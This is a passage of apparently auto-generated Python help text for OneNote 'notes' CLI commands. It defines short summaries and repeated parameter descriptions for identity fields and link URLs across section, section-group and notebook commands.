up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-section'] = """ type: command short-summary: "Get sections from users" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from users" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from users" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from users" """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in users" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSectionGroup for users" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for users" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from users" """ helps['notes get-parent-section-group'] = """ type: command short-summary: "Get parentSectionGroup from users" """ helps['notes get-section'] = """ type: command short-summary: "Get sections from users" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from users" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from users" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from users" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section-group'] = """ type: command short-summary: "Update the navigation property parentSectionGroup in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in users" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property sections for users" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for users" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-section'] = """ type: command short-summary: "Get sections from users" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from users" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from users" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from users" """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in users" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSectionGroup for users" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for users" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from users" """ helps['notes get-parent-section-group'] = """ type: command short-summary: "Get parentSectionGroup from users" """ helps['notes get-section'] = """ type: command short-summary: "Get sections from users" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from users" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from users" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from users" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section-group'] = """ type: command short-summary: "Update the navigation property parentSectionGroup in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in users" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSectionGroup for users" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for users" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from users" """ helps['notes get-parent-section-group'] = """ type: command short-summary: "Get parentSectionGroup from users" """ helps['notes get-section'] = """ type: command short-summary: "Get sections from users" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from users" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from users" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from users" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section-group'] = """ type: command short-summary: "Update the navigation property parentSectionGroup in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in users" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The 